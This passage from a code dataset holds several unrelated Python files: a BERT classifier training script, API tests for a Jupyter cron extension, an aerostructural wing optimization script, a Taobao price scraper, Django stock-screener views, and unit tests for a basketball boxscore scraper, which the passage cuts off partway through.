Only used when fp16 set to True.\\n\"\n \"0 (default value): dynamic loss scaling.\\n\"\n \"Positive power of 2: static loss scaling value.\\n\")\n parser.add_argument('--config_file', type=str, default='', help='The config file for the model you want to read in')\n parser.add_argument('--model_file', type=str, default='', help='The file name for the model you want to read in')\n\n parser.add_argument('--report_frequency', type=int, default=500, help=\"Number of epochs to call callback\")\n parser.add_argument('--tensorboard_log_dir', type=str, default=\"~/repo/tensorboard_data\", help=\"log_dir for tensorboard\")\n parser.add_argument(\"--run_name\", type=str, default=\"BERT\", help=\"Name of the run for tensorboard display\")\n parser.add_argument(\"--twist_frequency\", type=int, default=50, help=\"Frequency for DeepTwist; enter a nonpositive number to turn off twist_frequency\")\n parser.add_argument(\"--pretrained_weights_dir_for_training\", type=str, default=\"\", help=\"Directory of external weights to start training from\")\n args = parser.parse_args()\n\n tb_writer = SummaryWriter(log_dir=args.tensorboard_log_dir)\n\n if args.local_rank == -1 or args.no_cuda:\n device = torch.device(\"cuda\" if torch.cuda.is_available() and not args.no_cuda else \"cpu\")\n n_gpu = torch.cuda.device_count()\n else:\n torch.cuda.set_device(args.local_rank)\n device = torch.device(\"cuda\", args.local_rank)\n n_gpu = 1\n # Initializes the distributed backend which will take care of sychronizing nodes/GPUs\n torch.distributed.init_process_group(backend='nccl')\n\n logger.info(\"device: {} n_gpu: {}, distributed training: {}\".format(\n device, n_gpu, bool(args.local_rank != -1)))\n\n if args.gradient_accumulation_steps < 1:\n raise ValueError(\"Invalid gradient_accumulation_steps parameter: {}, should be >= 1\".format(\n args.gradient_accumulation_steps))\n\n args.train_batch_size = args.train_batch_size // args.gradient_accumulation_steps\n\n SEED = 2138\n random.seed(SEED)\n np.random.seed(SEED)\n torch.manual_seed(SEED)\n\n if n_gpu > 0:\n torch.cuda.manual_seed_all(args.seed)\n\n if not args.do_train and not args.do_eval:\n raise ValueError(\"At least one of `do_train` or `do_eval` must be True.\")\n if os.path.exists(args.output_dir) and os.listdir(args.output_dir) and args.do_train:\n raise ValueError(\"Output directory ({}) already exists and is not empty.\".format(args.output_dir))\n if not os.path.exists(args.output_dir):\n os.makedirs(args.output_dir)\n\n task_name = args.task_name.lower()\n if task_name not in processors: raise ValueError(\"Task not found: %s\" % (task_name))\n\n # processors and output_modes are dicts in data_processor\n processor = processors[task_name]()\n output_mode = output_modes[task_name]\n if task_name == \"mrpc\": processor.set_logger(logger)\n\n processed_data = process_data(processor,\n output_mode,\n args.data_dir,\n args.bert_model,\n args.do_lower_case,\n args.do_train,\n args.train_batch_size,\n args.gradient_accumulation_steps,\n args.num_train_epochs)\n\n (label_list, num_labels, tokenizer,\n train_examples, num_train_optimization_steps) = processed_data\n\n\n # Prepare model\n cache_dir = os.path.join(str(PYTORCH_PRETRAINED_BERT_CACHE), 'distributed_{}'.format(args.local_rank))\n model = BertForSequenceClassification.from_pretrained(args.bert_model,\n cache_dir=cache_dir, num_labels=num_labels)\n model.to(device)\n\n if args.local_rank != -1:\n try:\n from apex.parallel import DistributedDataParallel as DDP\n except ImportError:\n raise 
ImportError(\"Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.\")\n model = DDP(model)\n elif n_gpu > 1:\n model = torch.nn.DataParallel(model)\n\n if args.pretrained_weights_dir_for_training != \"\":\n with open(args.pretrained_weights_dir_for_training, \"rb\") as f:\n pretrained_weights = torch.load(f)\n model.load_state_dict(pretrained_weights)\n\n # Prepare optimizer\n param_optimizer = list(model.named_parameters())\n no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']\n optimizer_grouped_parameters = [\n {'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': 0.01},\n {'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)], 'weight_decay': 0.0}\n ]\n optimizer = BertAdam(optimizer_grouped_parameters,\n lr=args.learning_rate,\n warmup=args.warmup_proportion,\n t_total=num_train_optimization_steps)\n\n global_step = 0\n nb_tr_steps = 0\n tr_loss = 0\n\n if args.do_train:\n logger.info(\"***** Running training *****\")\n logger.info(\" Num examples = %d\", len(train_examples))\n logger.info(\" Batch size = %d\", args.train_batch_size)\n logger.info(\" Num steps = %d\", num_train_optimization_steps)\n\n train_dataloader = get_dataloader(\n train_examples, label_list,\n tokenizer, output_mode,\n args.max_seq_length,\n args.local_rank,\n args.train_batch_size, logger=None)\n\n model.train()\n\n counter = 0\n total_period_loss = 0\n print(\"Reporting every \" + str(args.report_frequency) + \" batches...\")\n\n for _ in trange(int(args.num_train_epochs), desc=\"Epoch\"):\n tr_loss = 0\n nb_tr_examples, nb_tr_steps = 0, 0\n for step, batch in enumerate(tqdm(train_dataloader, desc=\"Iteration\")):\n\n # Deep twist\n if counter % args.twist_frequency == 0 and counter > 0 and args.twist_frequency > 0:\n distort(model, **additional_args)\n\n batch = tuple(t.to(device) for t in batch)\n input_ids, input_mask, segment_ids, label_ids = batch\n\n # define a new function to compute loss values for both output_modes\n logits = model(input_ids, segment_ids, input_mask, labels=None)\n\n if output_mode == \"classification\":\n loss_fct = CrossEntropyLoss()\n loss = loss_fct(logits.view(-1, num_labels), label_ids.view(-1))\n elif output_mode == \"regression\":\n loss_fct = MSELoss()\n loss = loss_fct(logits.view(-1), label_ids.view(-1))\n\n if n_gpu > 1:\n loss = loss.mean() # mean() to average on multi-gpu.\n if args.gradient_accumulation_steps > 1:\n loss = loss / args.gradient_accumulation_steps\n\n loss.backward()\n\n tr_loss += loss.item()\n\n # Log to tensorboard\n counter += 1\n total_period_loss += loss.item()\n if counter % args.report_frequency == 1 and counter > args.report_frequency:\n writer_callback(counter, total_period_loss / args.report_frequency, tb_writer, args.run_name)\n total_period_loss = 0\n\n nb_tr_examples += input_ids.size(0)\n nb_tr_steps += 1\n if (step + 1) % args.gradient_accumulation_steps == 0:\n optimizer.step()\n optimizer.zero_grad()\n global_step += 1\n\n # Save a trained model and the associated configuration\n model_to_save = model.module if hasattr(model, 'module') else model # Only save the model it-self\n output_model_file = os.path.join(args.output_dir, WEIGHTS_NAME)\n torch.save(model_to_save.state_dict(), output_model_file)\n output_config_file = os.path.join(args.output_dir, CONFIG_NAME)\n with open(output_config_file, 'w') as f:\n f.write(model_to_save.config.to_json_string())\n\n # What's with the following code? 
Seems to save and then load the model just saved\n # # Load a trained model and config that you have fine-tuned\n # config = BertConfig(output_config_file)\n # model = BertForSequenceClassification(config, num_labels=num_labels)\n # model.load_state_dict(torch.load(output_model_file))\n\n # If we don't do_train\n elif args.model_file != \"\":\n config = BertConfig(args.config_file)\n model = BertForSequenceClassification(config, num_labels=num_labels)\n model.load_state_dict(torch.load(args.model_file))\n else:\n model = BertForSequenceClassification.from_pretrained(args.bert_model,\n cache_dir=cache_dir, num_labels=num_labels)\n\n model.to(device)\n\n if args.do_eval and (args.local_rank == -1 or torch.distributed.get_rank() == 0):\n logger.info(\"***** Running evaluation *****\")\n logger.info(\" Num examples = %d\", len(eval_examples))\n logger.info(\" Batch size = %d\", args.eval_batch_size)\n\n eval_examples = processor.get_dev_examples(args.data_dir)\n eval_dataloader = get_dataloader(\n eval_examples, label_list,\n tokenizer, output_mode,\n args.max_seq_length,\n args.local_rank,\n args.eval_batch_size, logger=None)\n\n model.eval()\n eval_loss = 0\n nb_eval_steps = 0\n preds = []\n\n for input_ids, input_mask, segment_ids, label_ids in tqdm(eval_dataloader, desc=\"Evaluating\"):\n input_ids = input_ids.to(device)\n input_mask = input_mask.to(device)\n segment_ids = segment_ids.to(device)\n label_ids = label_ids.to(device)\n\n with torch.no_grad():\n logits = model(input_ids, segment_ids, input_mask, labels=None)\n\n # create eval loss and other metric required by the task\n if output_mode == \"classification\":\n loss_fct = CrossEntropyLoss()\n tmp_eval_loss = loss_fct(logits.view(-1, num_labels), label_ids.view(-1))\n elif output_mode == \"regression\":\n loss_fct = MSELoss()\n tmp_eval_loss = loss_fct(logits.view(-1), label_ids.view(-1))\n\n eval_loss += tmp_eval_loss.mean().item()\n nb_eval_steps += 1\n if len(preds) == 0:\n preds.append(logits.detach().cpu().numpy())\n else:\n preds[0] = np.append(\n preds[0], logits.detach().cpu().numpy(), axis=0)\n\n eval_loss = eval_loss / nb_eval_steps\n preds = preds[0]\n if output_mode == \"classification\":\n preds = np.argmax(preds, axis=1)\n elif output_mode == \"regression\":\n preds = np.squeeze(preds)\n result = compute_metrics(task_name, preds, all_label_ids.numpy())\n loss = tr_loss/nb_tr_steps if args.do_train else None\n\n result['eval_loss'] = eval_loss\n result['global_step'] = global_step\n result['loss'] = loss\n\n output_eval_file = os.path.join(args.output_dir, \"eval_results.txt\")\n with open(output_eval_file, \"w\") as writer:\n logger.info(\"***** Eval results *****\")\n for key in sorted(result.keys()):\n logger.info(\" %s = %s\", key, str(result[key]))\n writer.write(\"%s = %s\\n\" % (key, str(result[key])))\n\n tb_writer.close()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"frtennis1/cs287-project","sub_path":"run_classifier.py","file_name":"run_classifier.py","file_ext":"py","file_size_in_byte":16813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39793776490","text":"import sys\n\nimport requests\nfrom notebook.nbextensions import enable_nbextension_python, install_nbextension_python\nfrom notebook.serverextensions import toggle_serverextension_python\nfrom notebook.tests.launchnotebook import NotebookTestBase\nfrom notebook.utils import url_path_join\nfrom traitlets.config.loader import Config\n\nimport nb_cron\n\n\nclass 
NbCronAPI(object):\n \"\"\"Wrapper for nbconvert API calls.\"\"\"\n\n def __init__(self, base_url, token):\n self.base_url = str(base_url)\n self.token = str(token)\n\n def _req(self, verb, path, body=None, params=None):\n if body is None:\n body = {}\n\n session = requests.session()\n resp = session.get(self.base_url + '?token=' + self.token, allow_redirects=True)\n xsrf_token = None\n if '_xsrf' in session.cookies:\n xsrf_token = session.cookies['_xsrf']\n body.update({'_xsrf': xsrf_token})\n response = session.request(\n verb,\n url_path_join(self.base_url, 'cron', *path),\n data=body, params=params,\n )\n return response\n\n def get(self, path, body=None, params=None):\n return self._req('GET', path, body, params)\n\n def post(self, path, body=None, params=None):\n return self._req('POST', path, body, params)\n\n def jobs(self):\n res = self.get([\"jobs\"])\n if res is not None:\n return res.json()\n else:\n return {}\n\n\nclass NbCronAPITest(NotebookTestBase):\n def setUp(self):\n if 'nb_cron' not in sys.modules:\n sys.modules['nb_cron'] = nb_cron\n c = Config()\n c.NotebookApp.nbserver_extensions = {}\n c.NotebookApp.nbserver_extensions.update({'nb_cron': True})\n c.NotebookApp.allow_origin = '*'\n c.NotebookApp.allow_credentials = True\n c.NotebookApp.disable_check_xsrf = True\n self.config = c\n install_nbextension_python(\"nb_cron\", user=True)\n enable_nbextension_python(\"nb_cron\")\n toggle_serverextension_python(\"nb_cron\", True)\n super(NbCronAPITest, self).setUp()\n self.__class__.notebook.init_server_extension_config()\n self.__class__.notebook.init_server_extensions()\n\n # chrome_options = Options()\n # # chrome_options.add_argument(\"--headless\")\n # self.driver = webdriver.Chrome(options=chrome_options)\n # self.driver.get(self.base_url() + '?token=' + self.token)\n # self.driver.implicitly_wait(120) # seconds\n # import time\n # time.sleep(60)\n\n self.cron_api = NbCronAPI(self.base_url(), self.token)\n self.job_schedule = \"* * * * *\"\n self.job_command = \"echo\"\n self.job_comment = \"comment\"\n self.notebook_path = \"tests/python parameter test.ipynb\"\n self.create_job()\n self.job_id = len(self.cron_api.jobs()) - 1\n\n def tearDown(self):\n # self.driver.quit()\n self.remove_job(self.job_id)\n super(NbCronAPITest, self).tearDown()\n\n def create_job(self, schedule=None, command=None, comment=None):\n return self.cron_api.post([\"jobs\", str(-1),\n \"create\"],\n params={\"schedule\": schedule or self.job_schedule,\n \"command\": command or self.job_command,\n \"comment\": comment or self.job_comment})\n\n def remove_job(self, jid=None):\n return self.cron_api.post([\"jobs\", str(jid or self.job_id),\n \"remove\"])\n\n def edit_job(self, jid=None, schedule=None, command=None, comment=None):\n return self.cron_api.post([\"jobs\", str(jid or self.job_id),\n \"edit\"],\n params={\"schedule\": schedule or self.job_schedule,\n \"command\": command or self.job_command,\n \"comment\": comment or self.job_comment})\n\n def check_schedule(self, schedule=None):\n return self.cron_api.post([\"schedule\", \"check\"],\n params={\"schedule\": schedule or self.job_schedule})\n\n def extract_papermill_parameters(self, notebook_path=None):\n return self.cron_api.post([\"notebook\", \"papermill\"],\n params={\"path\": notebook_path or self.notebook_path})\n\n def test_01_job_list(self):\n jobs = self.cron_api.jobs()\n root = filter(lambda job: job[\"schedule\"] == \"* * * * *\",\n jobs[\"jobs\"])\n self.assertGreaterEqual(len(list(root)), 1)\n\n def 
test_02_job_create_and_remove(self):\n self.assertEqual(self.create_job().status_code, 201)\n jid = len(self.cron_api.jobs()) - 1\n self.assertEqual(self.remove_job(jid).status_code, 200)\n\n def test_03_job_create_fail(self):\n self.assertEqual(self.create_job(schedule=\" \").status_code, 422)\n self.assertEqual(self.create_job(schedule=\"* * * * * *\").status_code, 422)\n \n def test_04_job_remove_fail(self):\n self.assertEqual(self.remove_job(' ').status_code, 404)\n self.assertEqual(self.remove_job(-2).status_code, 404)\n self.assertEqual(self.remove_job(999999).status_code, 422)\n\n def test_05_job_create_edit_remove(self):\n self.assertEqual(self.create_job().status_code, 201)\n jid = len(self.cron_api.jobs()) - 1\n self.assertEqual(self.edit_job(jid, command='echo edit test').status_code, 200)\n self.assertEqual(self.remove_job(jid).status_code, 200)\n\n def test_06_job_edit_fail(self):\n self.assertEqual(self.edit_job(jid=\" \").status_code, 404)\n self.assertEqual(self.edit_job(jid=8888).status_code, 422)\n self.assertEqual(self.edit_job(command=\" \").status_code, 422)\n self.assertEqual(self.edit_job(schedule=\" \").status_code, 422)\n self.assertEqual(self.edit_job(schedule=\"* * * * * *\").status_code, 422)\n\n def test_07_job_nonsense(self):\n r = self.cron_api.post([\"jobs\", str(self.job_id), \"nonsense\"])\n self.assertEqual(r.status_code, 404)\n\n def test_08_schedule_check(self):\n self.assertEqual(self.check_schedule().status_code, 200)\n\n def test_09_schedule_check_fail(self):\n self.assertEqual(self.check_schedule(schedule=' ').status_code, 422)\n self.assertEqual(self.check_schedule(schedule='* * * * * *').status_code, 422)\n\n def test_10_extract_papermill_parameters(self):\n self.assertEqual(self.extract_papermill_parameters(notebook_path='tests/python parameter test.ipynb').status_code, 200)\n self.assertEqual(self.extract_papermill_parameters(notebook_path='tests/spark parameter test.ipynb').status_code, 200)\n self.assertEqual(self.extract_papermill_parameters(notebook_path='tests/pyspark parameter test.ipynb').status_code, 200)\n\n def test_11_extract_papermill_parameters_fail(self):\n self.assertEqual(self.extract_papermill_parameters(notebook_path=' ').status_code, 422)\n self.assertEqual(self.extract_papermill_parameters(notebook_path='test.ipynb').status_code, 422)\n","repo_name":"alexanghh/nb_cron","sub_path":"tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":7138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35417843121","text":"\"\"\" This is the script that was used for the automated selection paper.\n\nCall as e.g. `python run_aerostruct_Q.py 1 30 100 75` to run an optimization\nThe first argument is the MDA approach index (see solver_options).\nThe second argument is the sweep angle in deg.\nThe third argument is the percentage factor to multiply the initial thickness os 2cm by.\nThe fourth argument if the percentage factor to miltiply the material E and G by.\n\n\"\"\"\n\nfrom __future__ import division, print_function\nimport sys\nfrom time import time\nimport numpy as np\n\n# Append the parent directory to the system path so we can call those Python\n# files. 
If you have OpenAeroStruct in your PYTHONPATH, this is not necessary.\nfrom os import sys, path\nsys.path.append(path.dirname(path.dirname(path.abspath(__file__))))\n\nfrom OpenAeroStruct import OASProblem\n\n# Suppress warnings\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nif __name__ == \"__main__\": \n\n # Some aircraft specs\n\n span = 28.42 # wing span in m\n root_chord = 3.34 # root chord in m\n cruise_CL = 0.607 # Cruise CL estimate\n t_ov_c = 0.14 # average t/c estimate\n MAC = 2.48 # mean aero chord\n W_wo_fuel_wbox = 25444. # Aicraft weight without fuel and wing struct\n SFC = 0.43/3600 # specific fuel consumption est\n rest_CD = 0.0142 # CD of rest of aircraft estimates\n\n\n # Mesh options\n\n nx = 3 # number of chordwise nodal points\n ny = 15 # number of spanwise nodal points for half wing\n\n\n # User inputs\n\n solver_option_index = int(sys.argv[1]) # MDA solver option index. See solver_options \n sweep_deg = int(sys.argv[2]) # Sweep angle in degrees\n thk_factor = (int(sys.argv[3])/100.) # Factor to adjust initial thickness\n stiffness_factor = (int(sys.argv[4])/100.) # Factor to adjust material stiffness\n \n # MDA approach options\n \n solver_options = ['gs_wo_aitken', 'gs_w_aitken', 'hybrid_GSN', 'newton_gmres', 'newton_direct', 'GS_then_Newton']\n solver_combo = solver_options[solver_option_index] \n solver_atol = 1e-6\n\n\n # Set problem type\n prob_dict = {'type' : 'aerostruct',\n 'optimize' : 'True',\n 'with_viscous' : True,\n # 'force_fd' : True,\n 'optimizer': 'SNOPT',\n 'cg' : np.array([30., 0., 5.]),\n 'solver_combo' : solver_combo,\n 'solver_atol' : solver_atol,\n 'print_level' : 2,\n 'Re' : 12e6, # Reynolds number\n 'reynolds_length' : MAC, # characteristic Reynolds length\n 'alpha' : 2., # [degrees] angle of attack\n 'M' : 0.5, # Mach number at cruise\n 'rho' : 0.57, # [kg/m^3] air density at 24,000 ft\n 'a' : 311., # [m/s] speed of sound at 24,000 ft\n 'g' : 9.80665, # [m/s^2] acceleration due to gravity\n # also change the 'CT' value below\n # accordingly if you alter this value\n 'CT' : SFC, # [1/s] specific fuel consumption\n 'R' : 2e6, # [m] maximum range\n 'W0' : W_wo_fuel_wbox, # [kg] MTOW\n }\n\n\n # Instantiate problem and add default surface\n OAS_prob = OASProblem(prob_dict)\n\n # Initialize the 3-D mesh object. Chordwise, spanwise, then the 3D coordinates.\n mesh = np.zeros((nx, ny, 3))\n\n # Start away from the symm plane and approach the plane as the array indices increase.\n mesh[:, :, 1] = np.linspace(-span/2, 0, ny)\n mesh[0, :, 0] = 0.34 * root_chord * np.linspace(1.0, 0., ny)\n mesh[nx-1, :, 0] = root_chord * (np.linspace(0.4, 1.0, ny)\n + 0.34 * np.linspace(1.0, 0., ny))\n for i in range(1, nx-1):\n mesh[i, :, 0] = ( mesh[nx-1, :, 0] - mesh[0, :, 0] ) / (nx-1) * i + mesh[0, :, 0]\n\n surf_dict = {'num_y' : ny,\n 'num_x' : 3,\n 'name' : 'wing',\n 'exact_failure_constraint' : False,\n 'mesh' : mesh,\n\n # Airfoil properties for viscous drag calculation\n 'k_lam' : 0.05, # percentage of chord with laminar\n # flow, used for viscous drag\n 't_over_c' : t_ov_c, # thickness over chord ratio\n 'c_max_t' : .303, # chordwise location of maximum (NACA0012)\n # thickness\n 'CL0' : 0., # rest of aircraft CL\n 'CD0' : rest_CD, # rest of aircraft CD\n\n 'symmetry' : True,\n 'num_twist_cp' : 5,\n 'num_thickness_cp' : 5,\n 'twist_cp' : np.array([0., 0., 0., 0., 0.]),\n 'thickness_cp' : thk_factor * 2. 
* np.array([0.01, 0.01, 0.01, 0.01, 0.01]),\n # Material properties taken from http://www.performance-composites.com/carbonfibre/mechanicalproperties_2.asp\n # 'E' : 45.e9,\n # 'G' : 15.e9,\n # 'yield' : 350.e6 / 2.0,\n # 'mrho' : 1.6e3,\n 'E' : 70.e9 * stiffness_factor, # [Pa] Young's modulus of the spar\n 'G' : 30.e9 * stiffness_factor, # [Pa] shear modulus of the spar\n 'yield' : 500.e6/ 2.5 / 1.5, # [Pa] yield stress divided by 2.5 for limiting case\n 'mrho' : 2.8e3, # [kg/m^3] material density\n 'fem_origin' : 0.4,\n 'exact_failure_constraint' : False, # if false, use KS function\n 'monotonic_con' : None,\n 'sweep' : 1. * sweep_deg\n }\n\n # Add the specified wing surface to the problem\n OAS_prob.add_surface(surf_dict)\n\n # Add design variables, constraint, and objective on the problem\n # OAS_prob.add_desvar('alpha', lower=-10., upper=10.)\n OAS_prob.add_constraint('L_equals_W', equals=0.)\n OAS_prob.add_objective('fuelburn', scaler=1e-5)\n\n\n # Setup problem and add design variables, constraint, and objective\n OAS_prob.add_desvar('wing.twist_cp', lower=-10., upper=10.)\n OAS_prob.add_desvar('wing.thickness_cp', lower=0.002, upper=0.2, scaler=1e2)\n OAS_prob.add_constraint('wing_perf.failure', upper=0.)\n OAS_prob.add_constraint('wing_perf.thickness_intersects', upper=0.)\n OAS_prob.setup()\n\n st = time()\n # Actually run the problem\n OAS_prob.run()\n\n print(\"\\nFuelburn:\", OAS_prob.prob['fuelburn'])\n print(\"Time elapsed: {} secs\".format(time() - st))\n print(OAS_prob.prob['wing.thickness_cp'])\n # print(OAS_prob.prob['wing_perf.disp'])\n print(OAS_prob.prob['wing_perf.structural_weight'])\n ","repo_name":"shamsheersc19/OpenAeroStruct","sub_path":"run_aerostruct_Q.py","file_name":"run_aerostruct_Q.py","file_ext":"py","file_size_in_byte":6919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"31475688411","text":"import requests\nimport re\n\ndef getHtmlText(url):\n\ttry:\n\t\trusult = requests.get(url,timeout=30)\n\t\trusult.raise_for_status()\n\t\trusult.encoding = rusult.apparent_encoding\n\t\treturn rusult.text\n\texcept Exception as e:\n\t\treturn e\n\t\n\n\ndef parserText(infoList,html):\n\ttry:\n\t\tpList = re.findall(r'\\\"view_price\\\"\\:\\\"[\\d\\.]*\\\"',html)\n\t\ttList = re.findall(r'\\\"raw_title\\\"\\:\\\".*?\\\"',html)\n\t\t# print(len(pList))\n\t\tfor i in range(len(pList)):\n\t\t\tprice = eval(pList[i].split(':')[1])\n\t\t\ttitle = eval(tList[i].split(':')[1])\n\t\t\t# print(title)\n\t\t\tinfoList.append([price,title])\n\texcept Exception as e:\n\t\tprint(\"parserError\",e)\n\ndef printInfo(infoList):\n\ttplt = '{:4}\\t{:8}\\t{:32}'\n\tprint(tplt.format('序号','价格','标题'))\n\t# print(infoList)\n\tcount = 0\n\tfor g in infoList:\n\t\tcount += 1\n\t\tprint(tplt.format(count,g[0],g[1]))\n\ndef main():\n\tgoods = '书包'\n\tpage = 3\n\tstart_url = 'https://s.taobao.com/search?q=' + goods\n\tinfoList = []\n\tfor i in range(page):\n\t\ttry:\n\t\t\turl = start_url + '&s=' + str(44*i)\n\t\t\thtml = getHtmlText(url)\n\t\t\t# print(html)\n\t\t\tparserText(infoList,html)\n\t\texcept:\n\t\t\tcontinue\n\tprintInfo(infoList)\nmain()\n\n\t","repo_name":"liuhe37186/studypython","sub_path":"taobao.py","file_name":"taobao.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73719544466","text":"from django.shortcuts import render, redirect, HttpResponse, HttpResponseRedirect\nimport plotly.io as pi\nimport datetime as dt\nfrom 
decimal import Decimal\nfrom datetime import timezone\nfrom screener.models import *\nfrom .helpers.db_manager import *\nfrom .helpers.plotter import *\nfrom .helpers.index_calculator import *\n\n# Create your views here.\ndef index(request):\n print(request)\n context={\n\n }\n return render(request, 'screener/landing.html', context)\n\n\ndef company(request):\n try:\n ticker = request.GET['search_query'].upper()\n #start_date = dt.datetime.strptime(request.GET['start_date'], '%Y-%m-%d').replace(tzinfo=timezone.utc).date()\n\n #start_date = request.GET['start_date']\n #end_date = request.GET['end_date']\n\n company = Company.objects.filter(ticker = ticker)\n\n if not company:\n #create company objects\n create_object(ticker)\n \n\n ## HANDLE ERRORS\n except Exception as e:\n context = { \n 'req': request.GET['search_query'],\n 'error': f\"{type(e).__name__} at line {e.__traceback__.tb_lineno} of {__file__}: {e}\",\n }\n return render(request, 'screener/404.html', context)\n\n \n # query db and create context\n company = Company.objects.filter(ticker = ticker)[0]\n\n # CALCULATE INDICES\n # get income_statement and balancesheet\n income_statement = pd.read_csv(ARCHIVE_PATH + \"income_statement/\" + str(company.income_statement), index_col=0)\n balancesheet = pd.read_csv(ARCHIVE_PATH + \"balancesheet/\" + str(company.balancesheet), index_col=0)\n cash_flow = pd.read_csv(ARCHIVE_PATH + \"cash_flow/\" + str(company.cash_flow), index_col=0)\n \n indices = calculate_indices(financials = income_statement, balancesheet = balancesheet)\n mean_indices = industry_mean(company.industry)\n\n # CREATE PLOTS\n # get history\n end_date = dt.datetime.today().date()\n history = pd.read_csv(ARCHIVE_PATH + \"history/\" + str(company.history), index_col='date')\n #convert dates to str\n start_date = dt.datetime.strftime(end_date-pd.DateOffset(years= 10), '%Y-%m-%d')\n end_date = dt.datetime.strftime(end_date, '%Y-%m-%d')\n\n candle_plot = pi.to_html( \n plot_candlestick(history.loc[start_date: end_date]), \n full_html=False, \n default_height=\"800px\"\n )\n\n asset_liabilities = pi.to_html(\n plot_balancesheet(balancesheet), \n full_html=False, \n #default_height=\"800px\"\n )\n\n revenue_income = pi.to_html(\n plot_income_statement(income_statement), \n full_html=False, \n #default_height=\"800px\"\n )\n\n context={\n\n 'ticker':company.ticker,\n 'name':company.name,\n 'sector':company.sector,\n 'industry':company.industry,\n 'phone':company.phone,\n 'website':company.website,\n 'country':company.country,\n 'state':company.state,\n 'city':company.city,\n 'address':company.address,\n 'summary':company.summary,\n 'employees':company.employees,\n\n 'latest_update':company.latest_update,\n\n 'balancesheet':balancesheet.iloc[:,:1].to_html(classes=\"table table-sm table-hover\", header=False),\n 'income_statement':income_statement.iloc[:,:1].to_html(classes=\"table table-sm table-hover\", header=False),\n 'cash_flow':cash_flow.iloc[:,:1].to_html(classes=\"table table-sm table-hover\", header=False),\n\n 'history':history,\n \n\n 'indices':indices,\n 'mean_indices':mean_indices,\n\n #plots \n 'candlestick': candle_plot,\n 'asset_liabilities': asset_liabilities,\n 'revenue_income': revenue_income,\n \n }\n\n return render(request, 'screener/company.html', context)\n\n\ndef update(request):\n \n ticker = request.GET['search_query'].upper()\n update_object(ticker)\n return HttpResponseRedirect('/company/?search_query=' + ticker)\n\n\n\ndef add_stock_to_portfolio(request):\n portfolio = Portfolio.objects.all()\n if 
request.method == 'POST':\n # Get the details from the form\n company_id = request.POST['company']\n quantity = int(request.POST['quantity'])\n purchase_price = Decimal(request.POST['purchase_price'])\n purchase_commission = Decimal(request.POST['purchase_commission'])\n purchase_date = dt.datetime.strptime(request.POST['purchase_date'], '%Y-%m-%d')\n\n # Find the company by its ID\n company = Company.objects.get(pk=company_id)\n\n # Add the new stock to the portfolio\n portfolio.add_stock(company, quantity, purchase_price, purchase_commission, purchase_date)\n\n # Redirect to the portfolio page\n return redirect('screener:portfolio_dashboard') # Assumes the URL is defined as 'portfolio:portfolio_details'\n \n # If the method is not POST or the form has errors, render the add-stock template\n companies = Company.objects.all()\n context = {\n 'companies': companies,\n 'portfolio': portfolio,\n }\n return render(request, 'screener/portfolio.html', context)\n","repo_name":"leoBitto/NFA_screener","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"17728693722","text":"import unittest\nimport pandas as pd\nimport boxscores\nfrom bs4 import BeautifulSoup\n\n\nclass TestScrapeForBoxscore(unittest.TestCase):\n\n    def test_scrape_boxscore_links(self):\n        html = 'Box Score'\n\n        links = boxscores.scrape_for_boxscore_links(html_string=html)\n\n        self.assertEqual(links, ['foo'])\n\n    def test_scrape_for_boxscore(self):\n        html = '''\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
Basic Box Score foo bar \n \n \n \n \n \n \n \n \n Basic Box Score \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n Basic Box Score foo BAR
\n '''\n\n mock_id = 'XY5430'\n\n df = boxscores.scrape_for_boxscore(BeautifulSoup(html, 'html.parser'),\n mock_id)\n\n expected = pd.DataFrame(\n data={'foo': ['bar', 'BAR'], 'TEAM': ['GSW', 'BRK'],\n 'GAME_ID': [mock_id, mock_id]}, index=[0, 1])\n\n self.assertIsInstance(df, pd.DataFrame)\n pd.testing.assert_frame_equal(df, expected)\n\n def test_format_dataframe(self):\n mock_data = {\n 'Starters': ['a', 'b', 'c', 'd', 'e', 'Reserves', 'g', 'h',\n 'Team Totals', 'a', 'b', 'c', 'd', 'e', 'Reserves',\n 'g', 'h', 'i', 'Team Totals'],\n 'MP': ['11:00', '1:00', '1:00', '1:00', '1:00', 'foobar', '1:00',\n 'Did Not Play', '44:00', '11:00', '1:00', '1:00', '1:00',\n '1:00', 'foobar', '1:00', 'Did Not Play', 'Did Not Dress',\n '44:00'],\n 'FG%': [1, 2, 3, 4, 5, 6, 7, 8, 9, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10],\n '3P%': [1, 2, 3, 4, 5, 6, 7, 8, 9, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10],\n 'FT%': [1, 2, 3, 4, 5, 6, 7, 8, 9, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n }\n mock_df = pd.DataFrame(data=mock_data)\n\n expected_data = {\n 'NAME': ['a', 'b', 'c', 'd', 'e', 'g', 'a', 'b', 'c', 'd', 'e',\n 'g'],\n 'MP': ['11:00', '1:00', '1:00', '1:00', '1:00', '1:00', '11:00',\n '1:00', '1:00', '1:00', '1:00', '1:00']\n }\n\n expected_df = pd.DataFrame(data=expected_data)\n formatted_df = boxscores.format_dataframe(mock_df)\n\n pd.testing.assert_frame_equal(formatted_df, expected_df)\n\n def test_set_dtypes(self):\n test_cases = {\n 'NAME': {'series': ['Hello', 'World', 'foo', 'bar'],\n 'dtype': 'string'},\n 'MP': {'series': ['11:11', '12:12', '13:13', '0:23'],\n 'dtype': 'timedelta64[ns]'},\n 'FG': {'series': ['1', '2', '3', '4'], 'dtype': 